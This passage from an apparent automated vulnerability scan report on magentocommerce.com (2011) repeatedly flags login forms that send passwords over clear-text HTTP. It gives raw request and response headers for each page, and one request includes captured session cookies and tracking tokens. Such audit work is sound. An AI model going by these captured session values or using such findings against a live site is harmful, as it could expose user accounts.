Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.97. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.98. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.99. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.100. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.101. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.102. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.103. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.104. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.105. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.106. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.107. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.108. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.109. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
